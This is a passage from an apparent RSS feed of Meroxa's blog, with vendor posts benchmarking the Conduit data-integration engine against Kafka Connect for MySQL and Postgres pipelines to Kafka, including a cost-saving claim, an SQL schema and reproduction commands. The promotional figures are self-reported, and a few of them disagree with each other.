    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 61%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAABYlAAAWJQFJUiTwAAACLUlEQVR42n2Ty2sTURSH8ze4dCHYhQhiqYqKoLFKF6JScFmXCl3V6qKNDRgVm5amZNE/QKguuqkrEevGhc/qQnGltAVfk5h2ksx0MjOZuc/5ee/kUUeJF84s5nC/8505Z1K+78M0TViWhUqlgmqtBkIY/neiqHcuJYQAYwycc4RhiEhqmAThgFElqFl1sK1N2IaBum3Bdy0FlL2BhBAEQdCt/GadY/kdxafvHJxx6LxQISmB7VG8XQuwukHheKqi4JBKKFIXo7Z2KgZ1WlExej9A3w0XhSckfiejVujzuSyRnm7ieM7Dh2+im08Y6jabbUMpJa4/bOLQXYbiwkfwfAaN+TxYvR7nv5Q4hmY9pGcCvF9+BfloEeHq61gkUne1ZepPXf0cf+BjYDrC3MRjOP27sZk+DPbzxw5wxsPpAsOLy9ewvW8X7MmxxKRSlNJ4GC3DCOOLGihRyD6DO9gPc3gItGS0gawFnFPAqzfhHOuDfTvzr6HsGEY7hoXsCtz0AZgXz4CVSknDDvDoXti5TNJQr0wYkr8Mk0Bq9DCMgZNJQ72HQshukTEFPHhPfcOpFXgn98M8n1aGRtdwMO/hlAK+vJKBc2QP7FsTSUNN1Za6ggZPLakpzgsUc0/hXDiBrZFhkHKr5bUSxaWii3PFJp6PZmGfHYA9ewdaR7T3MQbq5dXD0eH6BNsuQdn4Bb9eBW04IGporeERNHwKo1LD1/UN+DWV97w4F/8AQuA3htZOW3cftCkAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CPU usage&quot;
        title=&quot;&quot;
        src=&quot;/static/4979061d05e1d3e2ee404112d1fd5c73/5a190/mysql-cpu-usage.png&quot;
        srcset=&quot;/static/4979061d05e1d3e2ee404112d1fd5c73/772e8/mysql-cpu-usage.png 200w,
/static/4979061d05e1d3e2ee404112d1fd5c73/e17e5/mysql-cpu-usage.png 400w,
/static/4979061d05e1d3e2ee404112d1fd5c73/5a190/mysql-cpu-usage.png 800w,
/static/4979061d05e1d3e2ee404112d1fd5c73/187fa/mysql-cpu-usage.png 1194w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;When scaling up to a more powerful EC2 instance (c7a.xlarge), both Conduit and Kafka Connect were able to run the MySQL to Kafka pipeline. While Kafka Connect delivered slightly higher throughput, around &lt;strong&gt;135K msg/sec&lt;/strong&gt;, Conduit kept up with an impressive &lt;strong&gt;~89K msg/sec&lt;/strong&gt;, all while maintaining extremely efficient resource usage:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Conduit used &lt;strong&gt;75% less memory&lt;/strong&gt; compared to Kafka Connect (just &lt;strong&gt;500–600 MB&lt;/strong&gt; vs. over &lt;strong&gt;2 GB&lt;/strong&gt;).&lt;/li&gt;
&lt;li&gt;Conduit sustained its throughput with slightly higher CPU, showcasing how it trades CPU for memory, avoiding the usual heavyweight overhead that Kafka Connect tends to have.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;Key Findings: Conduit Delivers Efficient Performance at Scale&lt;/h1&gt;
&lt;p&gt;Across both tested EC2 instance types, from low-resource to high-resource environments, &lt;strong&gt;Conduit consistently proves to be a lean, reliable, and production-ready tool&lt;/strong&gt; for MySQL to Kafka pipelines.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;On &lt;strong&gt;c7a.large&lt;/strong&gt;, &lt;em&gt;&lt;strong&gt;Kafka Connect couldn’t even start&lt;/strong&gt;&lt;/em&gt;, while Conduit ran smoothly, delivering solid throughput with minimal resource usage.&lt;/li&gt;
&lt;li&gt;On &lt;strong&gt;c7a.xlarge&lt;/strong&gt;, Kafka Connect achieved higher throughput, but Conduit held close, using &lt;strong&gt;~75% less memory&lt;/strong&gt; while maintaining competitive performance. Even though Conduit used more CPU (around 80% vs Kafka Connect’s 60%), it did so &lt;strong&gt;intentionally and efficiently&lt;/strong&gt;, making better use of available system resources.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;If you&apos;re building streaming pipelines and care about efficiency, scalability, and cost, &lt;strong&gt;Conduit&lt;/strong&gt; isn&apos;t just an alternative, it&apos;s the better tool for the job.&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;Say Hello!&lt;/h2&gt;
&lt;p&gt;Curious about benchmarks? About Conduit? Have ideas for new tests, or have questions about other connectors? Drop us a “hello!” on our &lt;a href=&quot;http://discord.meroxa.com/&quot;&gt;Discord channel&lt;/a&gt; or open a &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub discussion&lt;/a&gt;!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Kafka Costs Are Too Damn High! Here's How We Saved 73.8% Per Month By Ditching Kafka Connect]]></title><description><![CDATA[Learn how Meroxa achieved a 73.8% cost reduction by replacing Kafka Connect with Conduit, their open-source data integration engine. Discover how they improved memory usage from 1.5GB to 100MB per connector, reduced startup times from 30-60s to ~1s, and cut monthly compute costs from $45K to $12K. This technical deep-dive explores real performance metrics, architectural benefits, and practical implementation details for teams looking to optimize their Kafka infrastructure costs.]]></description><link>https://meroxa.com/blog/kafka-costs-are-too-damn-high-heres-how-we-saved-738percent-per-month-by-ditching-kafka-connect</link><guid isPermaLink="false">https://meroxa.com/blog/kafka-costs-are-too-damn-high-heres-how-we-saved-738percent-per-month-by-ditching-kafka-connect</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Tue, 20 May 2025 11:02:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;If you&apos;re using Kafka Connect in production, you&apos;re probably wasting money.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We were.&lt;/p&gt;
&lt;p&gt;At Meroxa, our internal Kafka usage grew alongside our real-time data infrastructure—more topics, more partitions, more connectors. What didn&apos;t scale well? The cost of running Kafka Connect. And we’re not just talking about compute. There were hidden taxes everywhere: memory bloat, operational toil, brittle deployments, and oversized containers just to avoid the next OOM error.&lt;/p&gt;
&lt;p&gt;So we did what anyone tired of burning budget would do: &lt;strong&gt;we ripped it out&lt;/strong&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;The Setup: Kafka Connect at Scale&lt;/h3&gt;
&lt;p&gt;Our workloads relied on streaming structured data from multiple sources into Kafka—databases, APIs, event logs, you name it. Nothing exotic, but volume was high and reliability was non-negotiable. Like many teams, we leaned on Kafka Connect to stitch it all together.&lt;/p&gt;
&lt;p&gt;That meant standing up connectors (often Debezium-based), tuning memory settings, wiring up schema registries, and managing Kafka Connect workers. The architecture worked. But it came with a tax.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Memory usage per connector&lt;/strong&gt;: up to 1.5 GB&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Typical task restart time&lt;/strong&gt;: 30–60 seconds&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Monthly compute cost&lt;/strong&gt;: &lt;strong&gt;$45K&lt;/strong&gt; across dev, staging, and prod&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Eventually, we were spinning up dedicated infrastructure just to keep Kafka Connect stable—and still hitting bottlenecks, restart storms, and config drift. It became clear we were spending more time managing the system than moving data.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;The Shift: Conduit Instead of Kafka Connect&lt;/h3&gt;
&lt;p&gt;We replaced Kafka Connect with &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt;, an open-source data integration engine we’ve built and battle-tested at Meroxa. We dropped in our own native connectors and ran a head-to-head test.&lt;/p&gt;
&lt;p&gt;Here’s what we saw out of the box:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Connector memory usage&lt;/strong&gt;: ~ 400 MB compared to 7.5GB with Kafka Connect&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Task startup time&lt;/strong&gt;: ~1 second&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Same throughput, 73.8% lower cost&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We didn’t have to scale horizontally just to stay afloat. We didn’t need custom tuning profiles per connector. And we didn’t have to maintain a sprawling fleet of JVM-based connectors that didn’t fail gracefully.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;Real Numbers: Before and After&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Metric Comparison: Kafka Connect vs. Conduit&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Memory per connector&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Kafka Connect:&lt;/strong&gt; 1.5GB&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Conduit:&lt;/strong&gt; 100MB&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Startup time&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Kafka Connect:&lt;/strong&gt; 30–60s&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Conduit:&lt;/strong&gt; ~1s&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Monthly compute cost&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Kafka Connect:&lt;/strong&gt; ~$45k&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Conduit:&lt;/strong&gt; ~$12k&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Error recovery behavior&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Kafka Connect:&lt;/strong&gt; Manual restarts required&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Conduit:&lt;/strong&gt; Automatic retry&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Codebase complexity&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Kafka Connect:&lt;/strong&gt; Java + configs everywhere&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Conduit:&lt;/strong&gt; Go + single file&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We didn’t sacrifice performance. We gained &lt;em&gt;control&lt;/em&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;Why It Worked&lt;/h3&gt;
&lt;p&gt;Conduit is lean by design. Every connector runs in-process, with minimal external dependencies. While both Kafka Connect and Conduit offer &lt;a href=&quot;https://conduit.io/docs/using/other-features/schema-support/#schema-registry&quot;&gt;schema registries&lt;/a&gt;, Conduit takes a more streamlined approach: you only add what you need. No heavyweight plugins or complex distributed systems to manage. Just streams.&lt;/p&gt;
&lt;p&gt;We built it with the modern stack in mind:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Go-based core&lt;/strong&gt;: fast and efficient&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Built-in CDC&lt;/strong&gt;: no Debezium wrappers&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Minimal memory footprint&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://conduit.io/docs/scaling/conduit-operator&quot;&gt;&lt;strong&gt;Stateless deployment support&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can run Conduit inside a container, as a sidecar, or embedded directly inside your app. This flexibility gives us optimization options that just aren&apos;t possible with traditional Connect frameworks.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;The Best Part: Fewer Pages at 3AM&lt;/h3&gt;
&lt;p&gt;Performance gains are great. Cost savings are better. But the biggest win? We sleep more.&lt;/p&gt;
&lt;p&gt;Kafka Connect failed in ways that were annoying to debug. Silent data loss, zombie connectors, memory leaks—pick your poison. With Conduit, failures are obvious and recoverable. No more grepping logs across four services just to figure out why a connector died.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;Want to Try It?&lt;/h3&gt;
&lt;p&gt;If you’re already on Kafka and tired of throwing money at JVM tuning problems, &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt; is ready for you.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;✅ Drop-in connectors&lt;/li&gt;
&lt;li&gt;✅ Fast restarts&lt;/li&gt;
&lt;li&gt;✅ Low memory utilization&lt;/li&gt;
&lt;li&gt;✅ Built for streaming&lt;/li&gt;
&lt;li&gt;and &lt;a href=&quot;https://www.notion.so/Conduit-Embedded-API-PRD-193378e702b7807f8015d746ce0f9218?pvs=21&quot;&gt;many more features&lt;/a&gt; to help you stream data&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Hot take? Maybe. True? Absolutely.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://conduit.io/&quot;&gt;Give Conduit a spin →&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Postgres CDC Showdown: Conduit Crushes Kafka Connect]]></title><description><![CDATA[As we’re getting closer to the Conduit 1.0 release, we recently started conducting a series of benchmarks on our most popular connectors. We started with MongoDB and Kafka. In this post we'll talk about our performance findings for Postgres.]]></description><link>https://meroxa.com/blog/postgres-cdc-showdown-conduit-crushes-kafka-connect</link><guid isPermaLink="false">https://meroxa.com/blog/postgres-cdc-showdown-conduit-crushes-kafka-connect</guid><dc:creator><![CDATA[Raúl Barroso]]></dc:creator><pubDate>Fri, 16 May 2025 12:22:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;As we’re getting closer to the Conduit 1.0 release, we recently started conducting a series of benchmarks on our most popular connectors. We started with &lt;a href=&quot;https://meroxa.com/blog/conduit-makes-mongodb-cdc-52percent-faster-than-kafka-connect/&quot;&gt;MongoDB and Kafka&lt;/a&gt;, and in this case, we were eager to run some tests using one of our &lt;a href=&quot;https://conduit.io/docs/core-concepts#built-in-connector&quot;&gt;built-in connectors&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;More particularly, we wanted to put Conduit to the test, head-to-head against Kafka Connect, moving data from Postgres to Kafka. Our goal was to see just how much performance we could squeeze out of Conduit while still maintaining a reasonable usage of resources.&lt;/p&gt;
&lt;p&gt;The results were very promising. &lt;strong&gt;Conduit moved data faster than Kafka Connect&lt;/strong&gt; in both CDC and snapshot operations, and did it while using dramatically less memory: in some cases, over 98% less. In this post, we’ll break down how we ran the tests, share the numbers, and show where Conduit really shines.&lt;/p&gt;
&lt;h2&gt;Methodology&lt;/h2&gt;
&lt;h3&gt;Performance Measurement&lt;/h3&gt;
&lt;p&gt;To ensure consistency and accuracy, we used our own recently launched benchmarking tool, &lt;a href=&quot;https://conduit.io/changelog/2025-03-20-benchi-announcement&quot;&gt;Benchi&lt;/a&gt;. Benchi collects throughput data using Conduit’s built-in metrics and Kafka’s JMX metrics, while CPU and memory usage is monitored through Docker runtime stats. This setup lets us compare both tools under identical, automated conditions using the following metrics:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Message Throughput&lt;/strong&gt; (messages per second)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CPU Utilization&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Memory Usage&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Snapshots vs CDC&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Snapshot and CDC workloads have different performance profiles, so we made sure to configure them accordingly. Thankfully, Benchi allows us to do that very easily. The main differences in the setup were:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Snapshot&lt;/strong&gt;: All test data is loaded, and only once that is done, the pipeline starts running.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CDC:&lt;/strong&gt; Streaming is started and paused, data is inserted, then streaming resumes, forcing the pipeline into CDC mode.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This setup ensured both tools processed the same data under the same conditions in each mode (CDC or snapshot).&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Setup&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;All benchmarks ran on a t2.xlarge AWS EC2 instance (4 vCPUs, 16 GB RAM, 120 GB gp3 EBS volume). Kafka and Postgres ran in Docker containers, with a single Kafka broker and a single Postgres instance. While we did try different EC2 instances, we settled on the t2.xlarge because it had enough capacity to give Kafka Connect a fair chance. For Conduit, you can certainly run your pipelines in a much more constrained environment, massively reducing your cost.&lt;/p&gt;
&lt;p&gt;The amount of data we inserted into the Postgres instance for each test was 20 million records with the following schema:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TABLE&lt;/span&gt; employees &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
    id &lt;span class=&quot;token keyword&quot;&gt;INT&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;NOT&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;NULL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    name &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;255&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    email &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;255&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    full_time &lt;span class=&quot;token keyword&quot;&gt;BOOLEAN&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;NOT&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;NULL&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;DEFAULT&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;TRUE&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    position &lt;span class=&quot;token keyword&quot;&gt;VARCHAR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    hire_date &lt;span class=&quot;token keyword&quot;&gt;DATE&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;NOT&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;NULL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    salary &lt;span class=&quot;token keyword&quot;&gt;REAL&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;CHECK&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;salary &lt;span class=&quot;token operator&quot;&gt;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    updated_at TIMESTAMPTZ &lt;span class=&quot;token keyword&quot;&gt;DEFAULT&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;NOW&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    created_at TIMESTAMPTZ &lt;span class=&quot;token keyword&quot;&gt;DEFAULT&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;NOW&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;PRIMARY&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;KEY&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;id&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Conduit&lt;/h3&gt;
&lt;p&gt;We used the latest Conduit release, v0.13.4, with the Postgres connector and the &lt;a href=&quot;https://meroxa.com/blog/optimizing-conduit-5x-the-throughput/&quot;&gt;new pipeline engine&lt;/a&gt;. Pipelines used &lt;code class=&quot;language-text&quot;&gt;initial_only&lt;/code&gt; for snapshots and &lt;code class=&quot;language-text&quot;&gt;logrepl&lt;/code&gt; with logical replication slots for CDC.&lt;/p&gt;
&lt;h3&gt;Kafka Connect&lt;/h3&gt;
&lt;p&gt;We ran Kafka Connect v7.8.1 with the Debezium Postgres connector, using default worker settings, a 10 GB heap (&lt;code class=&quot;language-text&quot;&gt;KAFKA_HEAP_OPTS: &quot;-Xms10G -Xmx10G&quot;&lt;/code&gt;), and tuned batch/queue sizes.&lt;/p&gt;
&lt;p&gt;The full configurations are available for &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/main/benchmarks/postgres-kafka-cdc/kafka-connect/data/connector.json&quot;&gt;CDC&lt;/a&gt; and for &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/main/benchmarks/postgres-kafka-snapshot/kafka-connect/data/connector.json&quot;&gt;snapshots&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Running the Benchmarks&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;To reproduce these results, launch your own EC2 instance and follow these steps:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;&lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-L&lt;/span&gt; https://github.com/ConduitIO/streaming-benchmarks/archive/refs/heads/main.zip &lt;span class=&quot;token parameter variable&quot;&gt;-o&lt;/span&gt; streaming-benchmarks.zip
&lt;span class=&quot;token function&quot;&gt;unzip&lt;/span&gt; streaming-benchmarks.zip
&lt;span class=&quot;token builtin class-name&quot;&gt;cd&lt;/span&gt; streaming-benchmarks-main &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;make&lt;/span&gt; install-tools
&lt;span class=&quot;token function&quot;&gt;make&lt;/span&gt; run-postgres-kafka-cdc
&lt;span class=&quot;token function&quot;&gt;make&lt;/span&gt; run-postgres-kafka-snapshot&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;&lt;strong&gt;Results&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Here’s how Conduit and Kafka Connect compare in both modes:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Mode&lt;/th&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Message Rate (msg/s)&lt;/th&gt;
&lt;th&gt;CPU (%)&lt;/th&gt;
&lt;th&gt;Memory (MB)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CDC&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Conduit&lt;/td&gt;
&lt;td&gt;48,060&lt;/td&gt;
&lt;td&gt;110.2&lt;/td&gt;
&lt;td&gt;110.2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Kafka Connect&lt;/td&gt;
&lt;td&gt;44,889&lt;/td&gt;
&lt;td&gt;147.1&lt;/td&gt;
&lt;td&gt;6,863&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Snapshot&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Conduit&lt;/td&gt;
&lt;td&gt;70,753&lt;/td&gt;
&lt;td&gt;231.0&lt;/td&gt;
&lt;td&gt;2,234&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;Kafka Connect&lt;/td&gt;
&lt;td&gt;68,783&lt;/td&gt;
&lt;td&gt;184.2&lt;/td&gt;
&lt;td&gt;2,729&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;In CDC mode, Conduit&apos;s combination of higher throughput and significantly lower memory usage makes the biggest difference. We consider this a huge win, since pipelines typically spend most of their time in CDC. That efficiency directly impacts day-to-day operations and can dramatically reduce your infrastructure costs, or simply expand the options for where you can run your pipelines.&lt;/p&gt;
&lt;p&gt;For snapshots, the throughput gap was smaller, though Conduit still led. Memory consumption remained lower than Kafka Connect&apos;s, at the cost of higher CPU usage.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Charts&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/6ebee5a8524d159be37ad50c2e34f357/69476/cpu-usage.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 85.50000000000001%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACTElEQVR42qWUy2vUUBTG+69IwY1CUUZ0JbSoCC7VlQt36taFCNpB7AOp4sIHtj5AKC50VVFXoiKI0HbALnxMy2Se5jHJJPNKOpN7b5LPe2cmM0kd1NYDlwPJze9+3z3nZMTzPOL7PqIRBEEna5qGdDoN0zRRKBSgKDJkWYbY3tsSht/7rjTSarVIrVbDsBAgSZJQLBaRSqWQzeWgKkr/wKFAngmHgivFnyJklOsB5t+5+PrTiz4fACmlpFqtYqvt0LpY4h3zxPsAq1mG0YtNLH4inT2evwVIeFiWNRQY89RTuFbwsH/SxvPPLtA0QBvNnVkOgV/yDPuuETx7rUA7noB6+0Yc6Lou0XU9dtHCBuOZGWWQbAYBYwj194GvZKjje6DOTf2Dwp59bfoKNg6PgepldI8LIkAF6sReqDen40B+d6TRaMTucF2h+G5x4EwSmfEE2HaAosqi33x/YPnsAwcn7gHqzCSkicT2FIaWWcTy+UcOTi3sEChGr1KpxBSe48CTC/+h0LbtWFEuPHFw+iGgzCaRPXoQ1ND7wDUOTFwXbcOrfGQM6q3Zv1s+c9/BsTscmLyEjQO7QcsqwglblShGLxM8XZKhHdoFZerq71V2HAfRtbTi4MXyJuQ3L2EuPuYDocOhjB9KUDLamH/fxsflPEp352B8eAun3fYZpWCMdRVG5zZs8JzaQk7RYLtuRx3TFNRLBTT49bRtE/lcBpazyYfAR9hzPA2A0RCTsiJ5MMwaLK5OBM2sw/zxDUa1hkrFRL07w+Hvpm/5Fwom4JEqahI2AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;cpu usage&quot;
        title=&quot;&quot;
        src=&quot;/static/6ebee5a8524d159be37ad50c2e34f357/5a190/cpu-usage.png&quot;
        srcset=&quot;/static/6ebee5a8524d159be37ad50c2e34f357/772e8/cpu-usage.png 200w,
/static/6ebee5a8524d159be37ad50c2e34f357/e17e5/cpu-usage.png 400w,
/static/6ebee5a8524d159be37ad50c2e34f357/5a190/cpu-usage.png 800w,
/static/6ebee5a8524d159be37ad50c2e34f357/69476/cpu-usage.png 926w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
